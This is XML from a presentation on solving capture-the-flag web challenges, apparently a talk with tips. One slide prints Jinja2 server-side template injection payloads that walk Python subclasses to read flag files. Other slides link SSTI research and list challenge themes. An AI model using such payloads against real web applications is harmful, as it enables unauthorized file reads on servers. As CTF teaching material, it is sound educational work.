            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding the flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBFB413-EE7E-4E4A-8E6B-009DBBB58233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eventually, with a lot of trawling through the Flask documentation, and trial and error, I came to the solution by modifying the arbitrary file read found on https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pequalsnp-team.github.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>{{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>config.items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>()[4][1].__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>__[2].__subclasses__()[40](\"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/flag\").read() }}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config.items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()[4][1].__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__[2].__subclasses__()[40]('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>').read() }}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Slightly more elegant solution from another writeup:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>{{''.__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>__[2].__subclasses__()[40]('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>flag.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>').read()}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429481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A0E18F-A13B-FA4D-A887-282F1937C347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2836937" y="461793"/>
            <a:ext cx="6518126" cy="5934414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387041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698D-1CCE-7C4F-9249-175C1796A982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reading about Server-Side Template Injection (SSTI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0525DC8-5101-D548-967F-3DD0F874522C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://portswigger.net/blog/server-side-template-injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Other templating engines (e.g. Twig and Mako) can can be vulnerable to the same attack, and the articles above also give information on how to enumerate which one you are attacking. So even if you are not attacking a Flask application, keep this vulnerability in mind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A239E83-762B-BB4A-8CBE-4BFA313F2067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5815013"/>
            <a:ext cx="9969500" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47797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6DB9-DD69-6240-8C38-8A82A929026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Other CTF tips (mostly for web)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430632FF-CF20-A842-8241-24A5DF1B7DF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Follow the news</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Build some small web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Keep a repository of everything you’ve used or seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Curl is really handy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Become a Burp Suite master</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Learn HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Do tonnes of CTFs and read the writeups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Put in reasonable effort but if after 2 hours you haven’t made any progress, you’ve probably missed something simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(or made a typo in your payload)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309924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74F77-3852-1C4E-8C6F-A338FCEA278E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Hints, puns and available content is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" strike="sngStrike" dirty="0"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> the key solving CTF challenges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24324C67-CAF8-0B4E-8F44-ACDCAC82EE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5403273"/>
            <a:ext cx="10515600" cy="773690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>CTFs rarely have red herrings or things to explore that are not part of solving the challenge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFEB04F1-5B55-1140-BA41-208933552298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433671" y="1884652"/>
            <a:ext cx="3324657" cy="3324657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3508395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DD70-612C-DC45-B9B0-1A78EEC4DBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some challenges that essentially told you which path to take</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BE249D9-BB37-E641-9D9F-2D7E9299D527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2227385"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Not Another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Challenge		It was a trivial SQL injection task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Robots Rule					Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>robots.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to progress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Buckets					Amazon web buckets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stop and Listen				Listen to incoming traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B189087B-B7A9-874A-9C52-D615622DB712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4265490"/>
            <a:ext cx="3300033" cy="2227385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85DDE1C-AF7A-EE40-9774-ACF6087570C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4138233" y="5538768"/>
            <a:ext cx="7215567" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always look for the obvious signs, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or read the information given to you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140328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03EB6-F1A7-F14C-873D-AD112FF535CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Science!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AFB294-2053-F441-947E-3703557B82F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="6569202" cy="1738312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86ED0771-3400-1942-B778-57FC2B97154E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2597547" y="3885406"/>
            <a:ext cx="3042048" cy="1738313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EBA3D8-E75E-E743-8958-B726278A87E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651471" y="1503119"/>
            <a:ext cx="6934200" cy="446722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57FD6CC1-C155-884B-BB37-19EBF19153C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889458" y="922028"/>
            <a:ext cx="3768129" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>After poking around for a bit, it was clear you needed the right ”chemical one” and/or “chemical two” input to progress.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5EE64E-4218-C147-841F-D75B9AEEFC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193246" y="3255963"/>
            <a:ext cx="3098569" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Curved Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8BC588-7544-AC43-B733-C1F3FB7F83B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585671" y="3736732"/>
            <a:ext cx="607575" cy="1233731"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">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2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638B-C386-8546-8E95-21F84900DF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648929" y="629266"/>
            <a:ext cx="5585616" cy="1676603"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
